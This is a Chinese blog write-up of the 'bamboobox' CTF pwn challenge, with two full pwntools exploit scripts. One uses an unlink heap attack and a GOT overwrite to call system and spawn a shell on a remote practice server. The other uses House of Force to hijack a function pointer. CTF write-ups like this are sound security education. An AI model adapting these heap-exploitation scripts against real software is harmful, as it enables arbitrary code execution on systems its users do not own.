MENU

Catalog

    hitcontraining_bamboobox (unlink | house of force)

    December 24, 2020 • Read: 964 • Pwn

    1.unlink
    这种方法非常简单,也很容易构造,所以我决定挑战一下不用 show()的写法。
    需要 1/16 的概率来正确覆盖到堆地址。

    from pwn import *
    #context.log_level = "debug"
    libc = ELF('./libc.so.6')
    elf = ELF('./bamboobox')
    def choice(idx):
        r.sendlineafter("Your choice:", str(idx))
    
    def show():
        choice(1)
    
    def add(size, content = 'sh'):
        choice(2)
        r.sendlineafter("Please enter the length of item name:", str(size))
        r.sendafter("Please enter the name of item:", content)
    
    def edit(idx, content):
        choice(3)
        r.sendlineafter("Please enter the index of item:", str(idx))
        r.sendlineafter("Please enter the length of item name:", str(len(content)))
        r.sendafter("Please enter the new name of the item:", content)
    
    def delete(idx):
        choice(4)
        r.sendlineafter("Please enter the index of item:", str(idx))
    
    def pwn():
        add(0x88) #0
        add(0xF8) #1
        add(0x18) #2
        add(0x18) #3
        target = 0x6020C8
        magic = 0x400D49
    
        # unlink
        FD = target - 0x18
        BK = target - 0x10
        edit(0, p64(0) + p64(0x81) + p64(FD) + p64(BK) + 'a' * (0x80 - 0x20) + p64(0x80))
        delete(1)
    
        #partial overwrite & [email protected] -> [email protected] & [email protected] -> system
        edit(0, p64(0) * 3 + p64(elf.got['free']) + p64(0) + p64(elf.got['free']) + p64(0) + '\x40\x00')
        edit(0, p64(elf.plt['printf'] + 6) + p64(elf.plt['puts'] + 6))
        delete(2)
        malloc_hook_addr = u64(r.recvuntil('\x7f', timeout=1)[-6:].ljust(8, '\x00')) - 88 - 0x10
        if '0x7f' not in hex(malloc_hook_addr):
            raise EOFError
        libc.address = malloc_hook_addr - libc.sym['__malloc_hook']
        edit(1, p64(libc.sym['system']) + p64(elf.plt['puts'] + 6))
    
        #getshell
        delete(3)
        r.interactive()
    
    while True:
        try:
            #r = process('./bamboobox')
            r = remote('node3.buuoj.cn', 26620)
            pwn()
        except EOFError:
            pass

    2.house of force
    这是要说明的重点方法,也是我做这道题的根本原因。
    往低地址就是两者(low_addr - 0x10) - top_addr,往高地址,就是(high_addr - 0x10 - top_addr) - 0x10

    这里要注意一个细节
    第二次申请的时候,申请后的 top chunk size 不能小于 MINSIZE(0x10),即申请前的 malloc 堆块要大于申请 size + MINSIZE。
    否则会触发重新申请 top chunk,在检测是否对齐的时候就会报错。

    from pwn import *
    #context.log_level = "debug"
    libc = ELF('./libc.so.6')
    elf = ELF('./bamboobox')
    r = process('./bamboobox')
    #r = remote('node3.buuoj.cn', 26620)
    def choice(idx):
        r.sendlineafter("Your choice:", str(idx))
    
    def show():
        choice(1)
    
    def add(size, content = 'sh'):
        choice(2)
        r.sendlineafter("Please enter the length of item name:", str(size))
        r.sendafter("Please enter the name of item:", content)
    
    def edit(idx, content):
        choice(3)
        r.sendlineafter("Please enter the index of item:", str(idx))
        r.sendlineafter("Please enter the length of item name:", str(len(content)))
        r.sendafter("Please enter the new name of the item:", content)
    
    def delete(idx):
        choice(4)
        r.sendlineafter("Please enter the index of item:", str(idx))
    
    magic = 0x400d49
    add(0x30) #0
    edit(0, 'a' * 0x38 + p64(0xffffffffffffffff))
    size = (0x1ecc000 - 0x10) - 0x1ecc060
    add(size) #1
    add(0x18) #2
    edit(2, p64(magic) * 2)
    choice(5)
    r.interactive()
    Last Modified: February 28, 2022
    Archives QR Code
    QR Code for this page
    Tipping QR Code